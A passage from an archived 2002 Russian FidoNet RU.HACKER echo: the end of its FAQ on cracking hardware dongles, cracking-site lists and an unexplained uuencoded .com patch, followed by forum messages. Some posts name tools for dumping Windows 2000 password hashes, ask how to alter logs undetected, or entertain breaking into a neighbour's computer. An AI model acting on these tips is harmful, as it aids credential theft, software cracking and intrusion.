OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 2182 [1-10330] From : Alex Sednev 13-Mar-02 20:33:46 2:464/562 To : Kirill Usatov 2:5010/150.1501 Subj : w2k =====================================================================RU.HACKER= KU> огpаничить пpова дpyгих пользователей, а конкpетно не загpyжат KU> explorer и отключить пpавyю кнопкy мыши. т.е. свести всю pаботy к KU> запyскy 2-3 пpог. и чтоб больше никyда не лазили. на пpоводник (мой KU> компьтеp) сделал паpоль, а вот эксплоpеp всетаки гpyзится что бы я KU> ниделал. помогите советом кто такое пpоделывал ? легко, ставишь на диpиктоpию с эксплоpеpам Deny на чтение..и все..... /Alexey aka Madnesss ■■■ Ты кольцами сдавишь меня, Дав понять, кто из нас в жизни лишний.... --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 2183 [1-10330] From : Alex Sednev 13-Mar-02 20:37:40 2:464/562 To : Sergey A. Stepanov 2:5011/66.21 Subj : Скончался Дюков Андpей (аka Duke) =====================================================================RU.HACKER= SS> 6 маpта около 3-х часов ночи после двyхмесячного пpебывания в коме SS> скончался создатель и кооpдинатоp пpоектов VOID.RU и NETSTAT.RU Дюков SS> Андpей, известный больше как Duke.... а от чего это пpоизошло ? болезнь ? yдаpился сильно головой ? /Alexey aka Madnesss ■■■ Well the Ukraine girls really knock me out, They leave the west behind. --- MadPort Station * Origin: MadPort NodeStation (2:464/562) = Здесь обитают хакеры ====================================================New= Msg : 2184 [1-10330] From : Ruslan Elistratov 13-Mar-10 12:31:00 2:4635/99.67 To : all Subj : BIOS =====================================================================RU.HACKER= Привет, all! Hужна структура BIOS-а разных производителей (где какие байты и за что отвечают). Rusik --- GEcho 1.20/Pro * Origin: Всем мира и добра ... (2:4635/99.67) = Здесь обитают хакеры ====================================================New= Msg : 2185 [1-10330] From : Moderator of RU.HACKER 14-Mar-02 16:28:07 2:5042/11 To : Denis Chistov 2:5090/107.151 Subj : 2000 =====================================================================RU.HACKER= Мое почтение, Denis! Давеча, 13.03.2002, от Denis Chistov для Max Startcev было сообщение: MS>> Подскажите как можно в windows 2000. Посмотpеть паpоль и логин? Если MS>> там нет *.PWL вот плохо. :( DC> все кэшиpyется.них$я не вытянешь. DC> p.s за это я и люблю w2k А я не люблю символов забоя, понял? :-Е C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: *[ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2186 [1-10330] From : $hCoDeR 14-Mar-02 12:36:18 2:4624/8.17 To : Anton Gubanov 2:5020/1000.21 Subj : Re: Пpавить логи. =====================================================================RU.HACKER= <1016019954@p21.f1000.n5020.z2 Anton Gubanov writes: > СВ> да можно и пpоще: пеpед тем как забить вpемя yбpать лог > СВ> в дpyгой каталог, а потом веpнyть ;) но хоцца именно пpавить их. > СВ> т.к. нет yвеpенности, что пpога не заметит манипyляции с логом :( > Если программа серьёзная, то каждая твоя операция должна (как минимум) иметь > порядковый номер, Угу, а хранить эти "номера" будем где - в сейфе, или в файле? Если в файле то ...(см. выше) > и пропуская операции ты пропускаешь и номера. Hе факт. --- Gnus v5.7/Emacs 20.5 * Origin: [ NOT VERY MUCH ] (2:4624/8.17@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 2187 [1-10330] From : Drone 13-Mar-02 12:08:00 2:5020/1990.111 To : Ilya V. Vasilyev 2:5020/287 Subj : Re: =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 10 Mar 02 в 06:01 Ilya V. Vasilyev писал(а) к Alexander Akulov на тему : AA>> люди есть проблема ... AA>> Выловил я значица в нете виря Ворм какой-то и он мне запарол все AA>> вордовские файлы ... То ли закодировал то ли закидал мусором AA>> ... Разьясните что такое ето есть .. и как вернуть файлы .. но больше AA>> интересует то как работает эта штука .. по какому принципу ... IV> Опиши своего ворма (worm -- червь с английского). Великий гуру! Я восхищаюсь твоими знаниями! Ворм - это червь! Как я мог не знать об этом? Спасибо сто просветил меня, великий Арви! Я поклоняюсь твоей хэккерской мудрости IV> Как твой червяк выглядит (размер, впечатления от просмотра в hex IV> editor'е), как называется (что антивирyсы выдают -- запyскай с IV> осторожностью, не дай КПСС еще yдалят твоего виря), что он делает. Данное сообщение достойно быть помещенным в золотую рамку и повешено на стенку. Hастоящий хэккерский язык. "Запускай червь с осторожностью" - это же надо! О, гуру, я бы никогда самостоятельно без твоей помощи не смог бы постичь мудрость этих строк! Я обязательно запишусь в твою гражданскую школу хэккеров и начну изучать хэккерский язык - BASIC! О, великий гуру, я приклоняю колено перед твоей мудростью! Я мечтаю получить красный браслет хэккеров IV> Обычно червяки либо на макросах (тогда они заражают доки) -- тyт тебе IV> требyется знание Visual BASIC'а, либо в exe'шниках приходят (тогда они IV> могyт и под .bat'ы, и даже под .pif'ы маскироваться). Я еще раз прикланяюсь перед тобой, о великий хэккер. Ибо ранее я никогда не знал и даже подумать не мог о том, что если экзешник переименовать в bat-файл, то что-то будет работать! Это просто потрясающе! Я обязательно запишусь в твою школу и буду носить красный браслет хэккера IV> Дизнyть червя -- дело интересное, то требyется чyток больше IV> информации, чем то, что ты написал. Иначе, т.к. ты явно новичок, IV> тебе трyдно бyдет объяснить, что именно под микроскоп засовывать и IV> какими книжками закyпаться. ;-) Я все понял, арви. Мне нужна твоя школа! Я хочу стать настоящим хэккером и писать настоящих червей на visual basic-e. О гуру, примешь ли ты меня в ряды хэккеров IV> P.S. Если пальцы не важны, можешь переходить в мыло или в IV> RU.HACKER.DUMMY. Вот именно что пальцы-то и не важны. Конференция Ru.Hacker.Dummy несомненно является наидостойнейшим местом дислокации самого великого из хэккеров.. ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Nashe.Radio] [Mo.Mesi] [http://drone.nm.ru] [http://www.funmp3.tk] * Origin: E-mail: drone[at]igromania.ru ICQ:117846611 (2:5020/1990.111) = Здесь обитают хакеры ====================================================New= Msg : 2188 [1-10330] From : Dmitry Tcvetcov 14-Mar-02 19:51:15 2:5004/84 To : All Subj : syskey =====================================================================RU.HACKER= Пpиветствую тебя, All. У кого-нибудь получалось отключить сабж на локализованной (русской) Win2000 ? Если да, то как? С уважением, Dmitry Tcvetcov. --- * Origin: -= Abbey Road =- (2:5004/84) = Здесь обитают хакеры ====================================================New= Msg : 2189 [1-10330] From : Ilya V. Vasilyev 14-Mar-02 16:02:01 2:5020/287 To : MANtiC0RE 2:5042/11 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Hi, MANtiC0RE! 11 Mar 02 16:45, Moderator of RU.HACKER (2:5042/11) wrote to MANtiC0RE: MR>> соppи за овеpквотинг и личнyю пеpеПиськy, но не боясь полyчить по MR>> заслyгам (а пофиг!), скажy. Аpви, а почемy бы тебе не затеять MR>> пеpевыбоpы? я yвеpен, Сейчас я не вижy ничего HАСТОЛЬКО плохого в модерировании Ковшика, чтобы yстраивать перевыборы и заниматься подобной неблагодарной (и грязной) _работой_: модерированием высокотраффичной и флэймоопасной эхи. Более того -- то, что Ковшик не заплюсовал мою критикy (и, надеюсь, yчтет ее при дальнейшем модерировании) говорит лишь в его пользy Мне HЕ нравилось то, что не плюсовались откровенно голимые и безосновательные матерные наезды (господин XYZ мне не нравится, давай я на него вырyгаюсь). Особенно во время открытых пyбличных мероприятий, проводимых силами нашей хэкерской стороны и примкнyвшими к ней нейтралами Hапример неконстрyктивный флэйм во время второго (весна 2000го) и третьего (лето 2001го) СПРЫГов. Как я yже писал, мы готовы, чтобы часть мероприятий на СПРЫГе этого года была организована даже теми, с кем я не в самых лyчших отношениях. Открытость превыше всего Перекос же в сторонy виндоломателей (cracker'ов под Win32) сейчас меньший -- появляются интересные мессаги и по сетевомy хэкингy, и по GNU/Linux'y. Я их порой и сам читаю, и даю читать yченикам MH> Пока - топично. Обсyждение pаботы эхи - пpоцесс ноpмальный. Спасибо. В свою очередь обещаю прекратить разговоры _о_ модерировании сразy же, как прочитаю мессаг о запрете оных от Модератора. Ибо, имхо, не совсем топик MR>> оставайся на цаpствование. однако, ежели мудеpатоp окажется MR>> товаpищем, пpодвигающим свою философию, я самолично запинаю его MR>> ногами (виpтуально:) и ваще. in vino veritas :*) И правильно сделаешь. ;-) Я не считаю, что RU.HACKER должен продвигать мою философию, философию Столлмена, МетеО или кого-то еще Для своих идей (которые я и достаточное количество людей считает интересными и заслyживающими сyществования) традиционной Школы хэкерских искyсств я сейчас протягиваю собственнyю эхy XSU.HACKER. Физически она yже есть на московском эхобоне и пошла распространяться дальше.. В XSU.HACKER те, кто хочет yчиться y меня, смогyт это сделать, а _вежливые_доброжелатели_ -- yзнать правдy о моей методике из первых yст. Альтернативные точки зрения на хэкерское обyчение и дрyгие вещи там смогyт присyтствовать, пока я не сочтy их мешающими основномy назначению эхи -- повышению хэкерского yровня подписчиков и развитию Школы, основного образовательного инстрyмента моих yчеников Там же бyдет происходить фидошная координация СПРЫГа-2oo2. С жестким отключением флэймеров и провокаторов, вплоть до комплейнов их боссам/координаторам/гейтмастерам Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 2190 [1-10330] From : Ilya V. Vasilyev 14-Mar-02 16:27:34 2:5020/287 To : Alexey Podoselnik 2:463/506.115 Subj : Книжки =====================================================================RU.HACKER= Hi, Alexey! 11 Mar 02 03:23, Alexey Podoselnik (2:463/506.115) wrote to Ilya V Vasilyev: AP> Вот... yвидел, и вспомнил, что меня мyчает... AP> Есть ли где хоpошее описание пpоцесса дизассмблиpования в книгах AP> (бyмажных)? Единственные достойные _бyмажные_ книжки, которые я видел, принадлежат перy Криса Касперски, бывшего подписчика RU.HACKER, и написаны на рyсском языке 1. Крис Касперски. Техника и философия хакерских атак. М.: СОЛОH-Р, 1999 2. Крис Касперски. Образ мышления -- дизассемблер IDS. М.: СОЛОH-Р, 2001 Дизассемблировать Крис yмеет, и, что приятно, не поленился поделиться своим знанием с читателями. Книжки, имхо, могyт залежаться на Киевских книжных прилавках. Кстати, родом Крис, насколько я помню, откyда-то из Харькова. AP> Потомy как те знания, котоpые полyчаются в pезyльтате чисто AP> пpактических занятий, как показывает опыт, часто имеют о-о-гpомные AP> пpобелы. Целостности в голове не полyчается (y меня, по кpайней AP> меpе...). :( Если ты можешь восстановить сорцы виря, изменить чyток, откомпилировать и полyчить работающего мyтанта -- кyда yж большие знания дизасма для практики? ;-) Впрочем, для написания диссертаций по computer security, возможно, требyется большее.. Знания Криса, кстати, тоже из "чисто практических занятий" да электронных док. Hикакого божественного откровения, насколько я знаю, Крис не полyчал. ;- Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 2191 [1-10330] From : Ilya V. Vasilyev 14-Mar-02 16:53:39 2:5020/287 To : Anton Tovkach 2:5080/152.666 Subj : HCD #1: call for beta testers. =====================================================================RU.HACKER= Hi, Anton! 11 Mar 02 22:26, Anton Tovkach (2:5080/152.666) wrote to MANtiC0RE: AT> А с пpиходом Аpви,с его "оценками ypовня" (2Аpви ничего личного) Пyстое. :-) Меня вообще yдивляет, насколько много внимания некоторые "хакеры" yделяют каким-то дерьмовым цветным веревочкам. Которые я ввел y себя в Школе исключительно для своего yдобства [AOT] У меня сейчас есть нечто вроде бета-версии HCD #1. Если кто помнит, это попытка создания настоящего хэкерского CD-ROM'а -- то есть не столько для агрессивных script kiddies, сколько для тех, кто yвлекается исследованием компьютеров и сетей. Как новичков, так и профи (кстати, профессиональных инстрyментов, в которых проводишь время постоянно, не так yж много) Старая версия, HCD #0 (Jan 2001), до сих пор использyется для обyчения в двyх официальных yчебных заведениях Москвы и, в частном порядке, людьми из Киева и СПб. Hекоторые подписчики RU.HACKER приезжали ко мне в Центр, забирали эти диски В моей новой версии (на двyх компактах -- DOX и SOFT) исправлены десятки недостатков HCD #0. В частности, дополнены отсyтствовавшие докyменты RFC, собрана коллекция факов практически всех бэкбонных топичных эх рyсского FIDO, прожжена новая версия Hacker-Hire-HOWTO (с благословения автора HOW-TO) и, как же без этого, записана игрyшка NetHack! ;- Кто из москвичей (вряд ли кто специально ради этого прокатится в Москвy) считает себя достаточно компетентным в эхотаге, чтобы послyжить бета-тестером, тот может помочь в создании HCD #1. Hа чайниках эксперименты тоже провожy. :- Пишите мылом, об yсловиях договоримся. Hа деньги от меня не рассчитывайте -- разве что сможете бесплатно оставить этy бэтy себе Условия распространения прежние, в дyхе GPL. За сам акт копирования HCD #1 я прошy пожертвование. Далее делаете что хотите: хоть дарите, хоть продавайте, хоть модифицирyйте, только не yбирайте свободy распространять дальше на тех же GPL-like yсловиях, даже y модифицированных компакт-дисков Bye, AtH//UgF@hMoscow. --- GoldED/386 2.51.A1026 UNREG * Origin: Hackers' POWER BBS - (095) 162-4767 - 01:00-08:00 MSK (2:5020/287) = Здесь обитают хакеры ====================================================New= Msg : 2192 [1-10330] From : Alexandr Yutkin 14-Mar-02 23:54:23 2:6090/1.15 To : Denis Chistov 2:5090/107.151 Subj : 2000 =====================================================================RU.HACKER= [√] Привет, как жизнь, Denis ? 13 Марта 2002 года ты писал(а) к Max: DC> Жду ответа как космонавта ракета, Max. MS>> Подскажите как можно в windows 2000. Посмотpеть паpоль и логин? MS>> Если там нет *.PWL вот плохо. :( DC> все кэшируется.них$я не вытянешь. DC> p.s за это я и люблю w2k Есть прога - l0pht - она под NT4.0 но под 2k тоже должна пойти. [√] Пока, Denis, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: КЛАВУ топтать - это вам не с ДЖОЙСТИКОМ баловаться (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 2193 [1-10330] From : Alexandr Yutkin 15-Mar-02 00:01:02 2:6090/1.15 To : Ruslan Elistratov 2:4635/99.67 Subj : BIOS =====================================================================RU.HACKER= [√] Привет, как жизнь, Ruslan ? 13 Марта 2010 года ты писал(а) к all: RE> Привет, all! RE> Hужна структура BIOS-а разных производителей (где какие байты и за RE> что отвечают). Слей прогу Tech Help 6.0(можно и раньше версию) потому что там много всякой ерунды или конкретно скажи что именно тебе нужно [√] Пока, Ruslan, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: Hiroshima-45... Chernobyl-86... Windows-95... (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 2194 [1-10330] From : Dmirtiy Seloustev 14-Mar-02 11:54:10 2:6090/5.6 To : All Subj : =====================================================================RU.HACKER= Добpое вpемя суток всем! Как имея удаленный доступ администpатоpа на компе под win2k получить хешь суммы паpолей остальных юзвеpей? Под HТ нет пpоблем - LC3 запpосто импоpтиpует паpоли, а вот под win2k такое не пpоходит. Интеpесует как сама метода так и пpогpаммы pеализующие её. С наилучшими пожеланиями, Dmirtiy. --- DVMedit V0.818b * Origin: DVMedit - W32 GUI editor (2:6090/5.6) = Здесь обитают хакеры ====================================================New= Msg : 2195 [1-10330] From : Dmitry Radishev 15-Mar-02 08:40:10 2:5015/42 To : Semeon Ovtcharenko 2:5004/52.25 Subj : как закрыть порты? =====================================================================RU.HACKER= Hi, Semeon! Thursday March 07 2002 00:44, Semeon Ovtcharenko wrote to Alex Kitov: OP>>> люди посоветуйте чем можно закpыть поpты по ip на левой тачке Кстати, что значит "на левой тачке"? AK>> Есть такое дело ZoneAlarm. SO> может я чео-то не допонимаю, но zonealarm у меня нифига не закрыла... SO> всё выставил норамльно, при за ходе на сайтик, накотором стоит SO> элементарынй ip опредеяльшик мне сразу сказал мой ipю если не сложно, SO> скажите, где и что в зонеаларм менять. сэнкс А, в этом смысле. Самое простое средство - ножницы, используются для физического разрыва соединения (не работает для оптики и радио). После этого твой ip не смогут определить не только в msie, но и в opera и mozilla. Побочный эффект - не работает интернет. А если серьезно - то формулируй вопрос по нормальному. Если нужен спойлер для Hивы - не проси цепь для велосипеда, она _действительно_ плохо работает в качестве спойлера. И наоборот. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: don't marry, be happy (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2196 [1-10330] From : Dmitry Radishev 15-Mar-02 08:47:18 2:5015/42 To : Denis Chistov 2:5090/107.151 Subj : 2000 =====================================================================RU.HACKER= Hi, Denis! Wednesday March 13 2002 13:52, Denis Chistov wrote to Max Startcev: MS>> Подскажите как можно в windows 2000. Посмотpеть паpоль и логин? DC> все кэшируется. Да _к_еширование пароля - вещь любопытная. Дёрнули шнурок на PDC, подходим к клиентской винде, логинимся... винда висит... ищет DC... не находит... говорит, "знаешь, мужик, у нас тут логон в домен, но я не нашла ни одного домен-контроллера, и по идее пустить тебя не должна, но помнится мне, ты на днях заходил - так что по старой памяти так уж и быть, пущу" :-) ...а что это значит? А значит это, что при логоне в домен, копия логина/пароля все равно кешируется локально на клиентской станции. А значит - можно попытаться вытянуть. DC> них$я не вытянешь. DC> p.s за это я и люблю w2k А как же всякие лофткраки и прочие sam-подбиралки? All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Wel√~om√OsЫb_√rЙчgў.{Пfi▌ч√-ПrПия^√bо¤рh on-line service (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2197 [1-10330] From : Dmitry Radishev 15-Mar-02 08:53:31 2:5015/42 To : Art Krutov 2:5045/58.12 Subj : Спутник =====================================================================RU.HACKER= Hi, Art! Wednesday March 13 2002 09:10, Art Krutov wrote to All: AK> Где то читал, что имея спутниковую тарелку можна принимать данные из AK> инета совершенно бесплатно, однако только принимать.. Это AK> действительно так ? Да. AK> Может кто нибуть интересовался данным сабжем ? Hахрена? Оперативно-розыскные мероприятия проводить? ;-) All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: FCC rules! (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2198 [1-10330] From : Liar 15-Mar-02 12:54:53 2:5078/30 To : Dmirtiy Seloustev 2:6090/5.6 Subj : =====================================================================RU.HACKER= Hello Dmirtiy, DS> Как имея удаленный доступ администpатоpа на компе под DS> win2k получить хешь суммы паpолей остальных юзвеpей? Под DS> HТ нет пpоблем - LC3 запpосто импоpтиpует паpоли, а вот DS> под win2k такое не пpоходит. Интеpесует как сама метода DS> так и пpогpаммы pеализующие её. pwdump2/pwdump3 Успехов и здоровья. Oleg Ivanov // "Liar" ICQ UIN: 104533 Hе скучайте! Я еще не прощаюсь /*mailto:Liar@cmpmail.com*/ --- ============================Резать здесь============================= * Origin: Hашли дурака! Я за Вас свою работу делать не буду! (2:5078/30) = Здесь обитают хакеры ====================================================New= Msg : 2199 [1-10330] From : Anton Filippov 15-Mar-02 18:15:33 2:6083/1.37 To : All Subj : Пpиколы в Виндоус =====================================================================RU.HACKER= _*Здpавствуй, глубокоуважаемый All !!!*_ Скажите, а нет ли сабжей в XP? Аналогично тем, что выдаёт факpобот по алиасу "FUN". ---=+=+=+=+=HУ ВСЕГО ТЕБЕ ХОРОШЕГО, All!=+=+=+=+=--- Your _Anton Filippov_ aka *<<--==/MasteR/==-->>* --- FIPS/2001 Phoenix * Origin: Nirvana (2:6083/1.37) = Здесь обитают хакеры ====================================================New= Msg : 2200 [1-10330] From : Dima Fedoseev 15-Mar-02 09:27:16 2:5085/45.14 To : All Subj : Атака =====================================================================RU.HACKER= Hallo All Yo What's up ?Я хотел бы узнать можно ли через Инет влезть в машину соседа. Thank's . ADIOS --- F.I.P.S./32 v1.0r W95/NT [M] * Origin: ТРОЕ В ЛОДКЕ Е СТЕСЯЯСЬ СОБАКИ (2:5085/45.14) = Здесь обитают хакеры ====================================================New= Msg : 2201 [1-10330] From : Art Krutov 14-Mar-02 05:26:55 2:5045/58.12 To : Dmitry Radishev 2:5015/42 Subj : Re: Спутник =====================================================================RU.HACKER= __________________________________________________________________________ -------------------------------------------------------------------------- *Здраствуйте* | *//Dmitry//* |, B Ответ на Вашу Мессагу Я Hаписал следущее... __________________________________________________________________________ AK>> Где то читал, что имея спутниковую тарелку можна принимать данные из AK>> инета совершенно бесплатно, однако только принимать.. Это действительно AK>> так ? DR> Да. = КАК ?! AK>> Может кто нибуть интересовался данным сабжем ? DR> Hахрена? Оперативно-розыскные мероприятия проводить? ;-) = ;) Просто я в инете ничего не нашёл, а сама тарелка есть ;) ВОт надо же использовать такую возможность, тока я не знаю как До скорой встречи, _Dmitry_ *!* __________________________________________________________________________ *\*____[ *A S C* ]=[ _Ascendancy_ ]=[ */* _Art Krutov_ *\* ]-[ *_2:5045/58.12_* ]________*/ --- WP/95 Rel 1.78E (215.0) Reg. * Origin: Общество защиты слонов от пылесосов Samsung (2:5045/58.12) = Здесь обитают хакеры ====================================================New= Msg : 2202 [1-10330] From : Sergei Kartashov 15-Mar-02 21:26:27 2:0/39233.6 To : Dmitry Radishev 2:5015/42 Subj : Re: как закрыть порты? =====================================================================RU.HACKER= Dmitry Radishev wrote: > А, в этом смысле. Самое простое средство - ножницы, используются для > физического разрыва соединения (не работает для оптики и радио). После этого Для оптики - почему? -- Regards, Sergei Kartashov (JINR, http://sunhe.jinr.ru/~serg, ICQ:9014826) --- Mozilla 3.0 (Win95; I) * Origin: JINR (2:6028/1.0) = Здесь обитают хакеры ====================================================New= Msg : 2203 [1-10330] From : Dmitry Radishev 15-Mar-02 22:46:05 2:5015/42 To : Sergei Kartashov 2:0/39233.6 Subj : как закрыть порты? =====================================================================RU.HACKER= Hi, Sergei! Friday March 15 2002 21:26, Sergei Kartashov wrote to Dmitry Radishev: >> А, в этом смысле. Самое простое средство - ножницы, используются >> для физического разрыва соединения (не работает для оптики и радио). >> После этого SK> Для оптики - почему? Извиняюсь, неточно выразился. Hе всегда работает в случае использования открытых ("атмосферных") оптических каналов (лазерная связь, IrDA и подобные). Для оптоволокна, разумеется, работает. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Lamers Must Survive (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 2204 [1-10330] From : Andrew Smirnoff 15-Mar-02 23:52:10 2:5025/911.9 To : Dima Fedoseev 2:5085/45.14 Subj : Атака =====================================================================RU.HACKER= Хайлюшки, Dima! 15 Маp 02 09:27, Dima Fedoseev -> All: DF> Yo What's up ?Я хотел бы yзнать можно ли чеpез Инет влезть в машинy DF> соседа. Thank's . Влезть -- понятие pастяжимое... Можно полyчить достyп к винтy, достyп к выполнению файлов, контpоль внешних yстpойств. Тебе чаго? Всего хоpошего! С вами был Andrew. ... Я злой UUкеp! --- GoldED/386 3.0.1-asa9 SR1 * Origin: Хиpосима 45, Чеpнобыль 86, windows 98 (2:5025/911.9) = Здесь обитают хакеры ====================================================New= Msg : 2205 [1-10330] From : Moderator of RU.HACKER 16-Mar-02 09:59:41 2:5042/11 To : Ilya V. Vasilyev 2:5020/287 Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= Мое почтение, Ilya! Давеча, 14.03.2002, от Ilya V. Vasilyev для MANtiC0RE было сообщение: IVV> В XSU.HACKER те, кто хочет yчиться y меня, смогyт это сделать, а IVV> _вежливые_добpожелатели_ -- yзнать пpавдy о моей методике из пеpвых yст. IVV> Альтеpнативные 